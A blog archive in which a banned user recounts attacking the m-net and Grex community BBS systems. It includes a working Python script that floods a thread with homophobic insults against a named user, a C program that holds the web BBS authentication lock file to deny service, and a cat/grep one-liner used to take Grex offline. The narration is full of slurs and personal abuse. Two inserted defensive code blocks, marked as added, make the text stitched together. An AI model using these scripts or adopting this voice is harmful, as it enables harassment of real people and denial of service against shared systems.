Archive for the ‘M-net/Grex stuff’ Category

Flooding the m-net BBS

December 28, 2010

History
Once upon a time I got banned from m-net for computer hacking. Then, maybe like a week ago, the powers that be let me back on the system. I noticed right away that nothing changed. All I saw were a bunch of hose head “IT Professionals” gloating about all their wonderful work experience. Yet the same old crappy software bugs still existed. Then I started to wonder out loud “What good is all the fucking professional IT experience if you can’t even fucking fix the damn software on this site. I mean, it’s not like the admins are telling you no. In fact, the three stooges that run this dump actually encourage people to do software patches on the system.”

So after like 2 hours on the BBS, I was once again having a war of words with the regulars. I would call some of the regulars “fat and bald”. And in return, they would call me “A drunk pervert that has confessed to wearing pantyhose out in public.”

There was one particular jerk off IT professional that really irked me. I kept telling this homo to go fuck off. But yet, he still argued with me. So I got fed up and wrote a BBS respond flooder. Basically, more or less, the script would automatically do a shit load of responses in any given thread. Ie a topic.

For example, here would be a list of threads…

1 48 welcome to the december general conference item
2 4 december system problems item
3 250 december announcements item
4 2 december other conferences on m-net item
5 62 december happy item

Thread 5 would be the “december happy item”. The number 62 would represent the number of actual responses, by various users, in thread number 5.

The lead up to the abuse
For whatever reasons, this ‘IT Professional’, whom I shall refer to as the “homosexual ninny from england”, was really annoying me in thread 125. So I unleashed my script on this thread. Here is what the thread looked like..

125 1833 What would you buy Julian Assange for Christmas?

That’s right. There were over 1800 responses in that thread. And here is part of the output from the script itself..

Item 125 entered Sat, Dec 18, 2010 (15:29) by Sam (chiquita)
What would you buy Julian Assange for Christmas?

1816 new of 1833 responses total.

#18 Proud wife beater (duality) Sat, Dec 18, 2010 (18:56):
mart isnt bright

#19 Proud wife beater (duality) Sat, Dec 18, 2010 (18:56):
mart is a homosexual

#20 Proud wife beater (duality) Sat, Dec 18, 2010 (18:56):
mart takes it up the ass from cross

#21 Proud wife beater (duality) Sat, Dec 18, 2010 (18:57):
mart can go fuck off

#22 Proud wife beater (duality) Sat, Dec 18, 2010 (18:57):
mart is a queer ass virgin

#23 Proud wife beater (duality) Sat, Dec 18, 2010 (18:57):
mart is a fag

Shortly after this happened, I got all these lame accusations that I was just doing some kind of copy and paste job. So to rebuke all these fags, I posted the entire working code on this site. And here it is…

#----------------------------------------------------------
#The script starts in non-interactive mode (aka bot mode).
#Press ctrl-c to get into interactive mode and 'ctrl ^]' to
#get back into non-interactive mode.
#
#And now a few comments...
#
#a)The script only works on the Linux Operating System.
#  This is because the program relies on the concept of a
#  "psuedo terminal". As far as I know, the closest you
#  can get to a "psuedo terminal" in Windows is using something
#  like cygwin.
#
#b)Using something like 'ctrl ^]' to get back into non-interactive
#  mode is something that is mentioned python pexpect module,
#  but not in the actual pexpect document itself. 
#
#---------------------------------------------------------

import pexpect, time, signal, getpass

#I need a large list of profanity because the computer doesn't always
#follow the Gaussian Probability curve.

profanity = ["mart is a fag", "mart is a homo", "mart is dumb",
             "mart is a retard", "mart is a moron", "mart is stupid",
             "mart is a virgin", "mart is gay", "mart isnt witty",
             "mart sucks dans dick", "mart sucks his moms dick",
             "mart can go fuck off", "mart likes little boys",
             "mart isnt bright", "mart is a homosexual",
             "mart takes it up the ass from cross", "mart can go fuck off"]

x = 1

def mode(sig, data):
    global x
    x = x + 1
    
def get_name():
    user = raw_input("Username: ")
    password = getpass.getpass("Password: ")
    idle(user,password)
    
def idle(user,password):
    y = 1
    max = len(profanity)
    count = 0
    
    bbs = pexpect.spawn('telnet arbornet.org')
    bbs.expect('login:')
    bbs.sendline(user)
    print bbs.before,bbs.after,
    bbs.expect('[Pp]assword:')
    bbs.sendline(password)
    bbs.sendline('\n')
    bbs.sendline('bbs')

    while bbs.isalive():
        if ((y % x ) == 0):
            bbs.expect('Ok: ')
            bbs.sendline('r noresp 125')
            bbs.expect('Respond or pass?')
            bbs.sendline('r')
            bbs.expect('>')
            if count < max:
                bbs.sendline(profanity[count])
                count = count + 1
            else:
                count = 0
                bbs.sendline('mart is a queer ass virgin')
            bbs.sendline('.')
            time.sleep(5)
        else:
            bbs.interact()
            y = y + 1
        
if __name__ == "__main__":
    signal.signal(signal.SIGINT, mode)
    get_name()        
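
From the operator's side, the run above is easy to spot in the item itself: one login producing response after response inside the same minute. The following is an added example, not code from the original post or from YAPP; it parses response headers in the layout shown in the transcript and flags any login that exceeds a posting rate. The threshold, the window, the function names and the sample logins are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Header layout taken from the transcript: "#18 Full Name (login) Sat, Dec 18, 2010 (18:56):"
HEADER = re.compile(
    r"^#(\d+) .*\((\w+)\) (\w{3}, \w{3} \d{1,2}, \d{4}) \((\d{2}:\d{2})\):$")

def parse_headers(transcript):
    """Yield (response_no, login, timestamp) for every response header line."""
    for line in transcript.splitlines():
        m = HEADER.match(line.strip())
        if m:
            ts = datetime.strptime(m.group(3) + " " + m.group(4),
                                   "%a, %b %d, %Y %H:%M")
            yield int(m.group(1)), m.group(2), ts

def find_floods(transcript, max_posts=4, window=timedelta(minutes=2)):
    """Map each flooding login to the response number where it first had
    more than max_posts responses inside the sliding window."""
    recent = defaultdict(deque)   # login -> timestamps still inside the window
    flagged = {}
    for num, login, ts in parse_headers(transcript):
        q = recent[login]
        q.append(ts)
        while ts - q[0] > window:  # timestamps only have minute resolution
            q.popleft()
        if len(q) > max_posts and login not in flagged:
            flagged[login] = num
    return flagged

# Constructed sample: logins and bodies are made up, only the header layout
# comes from the page. "floodacct" posts three responses per minute.
SAMPLE = "\n".join(
    ["#17 Regular User (alice) Sat, Dec 18, 2010 (18:40):", "constructed reply"]
    + [f"#{18 + i} Scripted Account (floodacct) Sat, Dec 18, 2010 "
       f"(18:{56 + i // 3}):\nconstructed text" for i in range(6)]
    + ["#24 Regular User (alice) Sat, Dec 18, 2010 (18:58):", "constructed reply"]
)

if __name__ == "__main__":
    print(find_floods(SAMPLE))
```

The same counter, applied when a response is submitted rather than after the fact, is a per-login rate limit that would have stopped the item from ever reaching its response cap.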

The actual deleting of the BBS item
So I began to wonder if I could max out the number of responses in any given thread. And if so, what would happen. This line of thinking stems from freshman level Calculus at UW. You see, I had a professor that always told us “All the interesting math happens at the boundaries of a function.” So, uhhh…, like… I just extended this concept to the realm of computer programming. I swear to god this isn’t made up. Quit laughing and fucking give me some mother fucking support.

So I ran the script for like maybe 90 minutes. After that, I got the following error messages on my computer…

[cdalten@localhost oakland]$ ./mnut.py
Username: duality
Password:
Trying 69.39.89.95…
Connected to arbornet.org (69.39.89.95).
Escape character is '^]'.

FreeBSD/i386 (m-net.arbornet.org) (ttypn)

login:
Traceback (most recent call last):
  File "./mnut.py", line 97, in ?
    get_name()
  File "./mnut.py", line 45, in get_name
    idle(user,password)
  File "./mnut.py", line 82, in idle
    bbs.expect('>')
  File "/usr/lib/python2.4/site-packages/pexpect.py", line 1311, in expect
    return self.expect_list(compiled_pattern_list, timeout, searchwindowsize)
  File "/usr/lib/python2.4/site-packages/pexpect.py", line 1325, in expect_list
    return self.expect_loop(searcher_re(pattern_list), timeout, searchwindowsize)
  File "/usr/lib/python2.4/site-packages/pexpect.py", line 1409, in expect_loop
    raise TIMEOUT (str(e) + '\n' + str(self))
pexpect.TIMEOUT: Timeout exceeded in read_nonblocking().

version: 2.3 ($Revision: 399 $)
command: /usr/kerberos/bin/telnet
args: ['/usr/kerberos/bin/telnet', 'arbornet.org']
searcher: searcher_re:
0: re.compile(">")
buffer (last 100 chars): ? r
Too many responses on this item!

Respond or pass?
before (last 100 chars): ? r
Too many responses on this item!

Respond or pass?
after: pexpect.TIMEOUT
match: None
match_index: None
exitstatus: None
flag_eof: False
pid: 30555
child_fd: 3
closed: False
timeout: 30
delimiter: pexpect.EOF
logfile: None
logfile_read: None
logfile_send: None
maxread: 2000
ignorecase: False
searchwindowsize: None
delaybeforesend: 0.05
delayafterclose: 0.1
delayafterterminate: 0.1

Basically, I had entered in too many responses in thread 158. Uhh… yeah, more or less I tested my theory on thread 158. Why that thread? I have no idea. I was fucking drunk at the time, and uh like, it just sounded like the cool thing to do.

And here is what happened when I logged into the system to manually enter a response…

#1999 Proud wife beater (duality) Sun, Dec 26, 2010 (13:12):
MART IS GAY

Respond or pass? r
Too many responses on this item!

That’s right, the m-net bbs wouldn’t let me enter in response number 2000.

I saw the following when I looked at the threads on m-net…

158 1999 What did you get, fuckers?
159 5 Why the Hell didn’t she just call her neighbors?
160 0 The cat was allowed back upstairs after being the basement for two days. He is not quick to forgive…

Ok:

And then, when I browsed the threads again, I saw the following..

m-net% bbs
YAPP 3.1.1 Copyright (c)1995 Armidale Software
Registered to: Arbornet
Invalid format of sum file

155 2 ho hoe whoe
156 10 oy vey
157 7 ho rudolph red nosed reindeer got his red nose

Ok:

155 2 ho hoe whoe
156 10 oy vey
157 7 ho rudolph red nosed reindeer got his red nose
161 0 Nice censorship

Ok:

Threads 158 (the one I maxed out the responses with), 159, and 160 got deleted.

At first I thought the m-net admins just deleted the shit. But they told me no. So when I asked what happened, they told me it was a “system glitch”.

The aftermath
I’ve had a few people ask me to explain how the code works. I refuse to do that since I couldn’t do any justice to the explanation. I would say use google, but like googling isn’t enough. Instead, let me cite one of the comments made in one of the python modules used in this code..

[cdalten@localhost ~]$ more /usr/lib/python2.4/pty.py
"""Pseudo terminal utilities."""

# Bugs: No signal handling. Doesn't set slave termios and window size.
# Only tested on Linux.
# See: W. Richard Stevens. 1992. Advanced Programming in the
# UNIX Environment. Chapter 19.
# Author: Steen Lumholt -- with additions by Guido.

The book is kind of expensive, hard to find, and not exactly easy to read. But I still feel that’s better than some half baked moronic response found on some loser unix forum site dominated by a bunch of moron “IT professionals” who have zero academic publications to their name.

How the m-net web BBS went down in 27 lines of C code

October 22, 2009

A Brief History of the Abuse
I think it was maybe around June of 2009 that the web BBS (Bulletin Board System) portion of m-net went screwy. What would happen is that a user would enter their login name and correct password, but for whatever reasons, the system wouldn’t let them on.

Anyways, the homosexual Indian of m-net had decided to take a break from his $8.00/hr gardening job and then tried to figure out what was going on. He reasoned out that the source of the problem was me locking the pwauth.lock file. Ie, the file that controls password authentication for the web BBS on m-net.

Not only was he wrong, but it turns out that if a person places a lock over the pwauth.lock file, the m-net web BBS will stop taking requests. I guess it could maybe be considered a denial of service attack. So I ended up doing a proof of concept attack. I wrote the code in C so that the m-net staff couldn’t see the source code to the executable file. Below is the code that I used to demonstrate the attack. All I did was just compile and run it from the m-net shell.

#include <stdio.h>
#include <stdlib.h>

#include <fcntl.h>
#include <unistd.h>

#define BBS "/var/run/pwauth.lock"

int main(void) {
  int fd;

  if ((fd = open(BBS, O_RDONLY)) < 0) {
    fprintf(stderr, "Unable to open pwauth file\n");
    exit(EXIT_FAILURE);
  }

  if (flock(fd,LOCK_EX) == -1) {
    fprintf(stderr, "Unable to acquire lock\n");
    exit(EXIT_FAILURE);
  }

  sleep(9999999);

  close(fd);

  exit(EXIT_SUCCESS);
}
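
The service side of this lock-file problem, as an added example (not code from the original post or from pwauth): `flock()` only needs an open descriptor, so a read-only open is enough to hold `LOCK_EX`, and a service that waits with a blocking `flock()` stalls for as long as the holder sleeps. The sketch checks whether accounts other than the owner can open the lock file and takes the lock with `LOCK_NB` and a deadline so a held lock becomes an error instead of a hang; the temporary path, the function names and the 0600 mode are assumptions.

```python
import fcntl
import os
import tempfile
import time

def lock_file_exposed(path):
    """True if group/other can open the file at all; any open (read or
    write) is enough to call flock() on it."""
    return bool(os.stat(path).st_mode & 0o066)

def acquire_with_deadline(fd, deadline_s=1.0, poll_s=0.05):
    """Try for LOCK_EX without ever blocking indefinitely.
    Returns True if the lock was obtained before the deadline."""
    end = time.monotonic() + deadline_s
    while True:
        try:
            fcntl.flock(fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
            return True
        except BlockingIOError:          # lock is held on another open file
            if time.monotonic() >= end:
                return False             # caller can log and fail the request
            time.sleep(poll_s)

def demo():
    """Reproduce the held-lock situation on a temp file (constructed path)."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "pwauth.lock")
        os.close(os.open(path, os.O_CREAT | os.O_RDWR, 0o644))
        os.chmod(path, 0o644)                      # weak: world-readable
        exposed_before = lock_file_exposed(path)

        holder = os.open(path, os.O_RDONLY)        # read-only is sufficient
        fcntl.flock(holder, fcntl.LOCK_EX)
        service = os.open(path, os.O_RDONLY)       # separate open, as a second process would have
        got_while_held = acquire_with_deadline(service, 0.3)

        os.close(holder)                           # closing releases the lock
        got_after_release = acquire_with_deadline(service, 0.3)
        os.close(service)

        os.chmod(path, 0o600)                      # corrected: owner only
        exposed_after = lock_file_exposed(path)
        return exposed_before, got_while_held, got_after_release, exposed_after

if __name__ == "__main__":
    print(demo())
```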

Grex Grep Bug

October 22, 2009

Note: This bug doesn’t work on m-net. I verified this one day when tonster stepped away from the terminal so that he could have mad cybersex with trex.

Prelude
During January 2008 I was struggling to learn the concept of a Unix device driver. I think it was Barry out at MIT that told me the behavior of /dev/tty and the behavior of /dev/null were two different things. I was sort of mystified, so I just started playing with /dev/null. During one of my late night adventures I found out that

cat < /dev/zero > /dev/null

ended up consuming 99% cpu time on both my Linux box and the Grex OpenBSD box. This shell combo by itself had no great impact on either system because most Unix variants are I/O bound (vs cpu bound). I think this is the official starting point of what would later become known as the grep bug.

The lead up to the bug
I ended up asking about this behavior on comp.unix.questions. Here is the URL to that thread

Understanding /dev/null

Someone I knew read this thread and then modified it to the following

cat < /dev/zero | grep "f" > /dev/null &

I only found this out because this person was lagging Grex. Here is a copy of the email I got from him regarding the lag.

“whoa !

cat < /dev/zero | grep "f" > /dev/null &

run that a few times. maybe like 10 or so. it’s fun! thanks for the inspiration!

On 1/27/08, C D wrote:

> > load averages: 16.29, 15.21, 13.76 18:41:51
> > 323 processes: 314 idle, 7 stopped, 1 zombie, 1 on processor
> > CPU states: 25.0% user, 0.1% nice, 12.4% system, 1.0% interrupt, 61.5% idle
> > Memory: Real: 176M/373M act/tot Free: 125M Swap: 342M/2048M used/tot
> >
> > PID USERNAME PRI NICE SIZE RES STATE WAIT TIME CPU COMMAND
> > 4372 naftee -5 0 164M 146M sleep biowai 84:25 8.01% grep
> >
> >
> > What was the magical shell command to do this?
> >”

Basically, he didn’t realize that the modified shell combo caused the system (ie Grex) to slow down.

The attack and the aftermath
I had theorized that if someone would run 15 of these at once, they could effectively cause the entire system to hang. One of my friends actually put this theory to test. The end result was that he was able to take Grex offline for about a week. Once the system came back up, the Grex Users saw the following

login: mickeyd
Password:

Grex was down because a few sociopathic individuals have taken a great delight in exploiting a bug in the op system. This requires no great skill, just a deformed soul. Grex will be back up later today (thurs). STeve

Connection to grex.org closed by foreign host.

Life After Being Banned from M-net.

October 22, 2009

It’s been a little bit over a week since I got banned from M-net for computer hacking.  I thought about it and decided to never do this kind of stuff again.

So why did I start computer hacking in the first place? At first, it was the challenge. I saw m-net, and grex, as this vast public bbs system that was powered by some of the most original software that I had seen up to that point in my life. I just remember being in total awe. I was like “Wow, this is really f-cking cool. I really don’t this place for the IRC. The software that powers this joint looks far far more interesting.”

Then I started to learn the quirks in the system. I found out that some of these quirks could be used to halt parts of the system. This was the ultimate adrenaline rush for me. I had finally found a way to channel all my anger, from my personal issues, via computer hacking. But this is when things got bad. I started to abuse the system to prevent users that I didn’t like from actually using m-net. Right before I had got banned, this person on m-net called slack told me to try and vent my anger and aggression through a guitar vs computer hacking before I ended up in legal trouble.

I guess I should have taken her warning. Because shortly after her warning, this whole thing got so out of control that m-net banned me and then threatened to prosecute me for computer hacking.

So now, I’ve just decided to blog for the time being. I don’t know how long this will last. In between, I’ve also been trying to get help with some of my personal issues before I really do something that will land me in jail.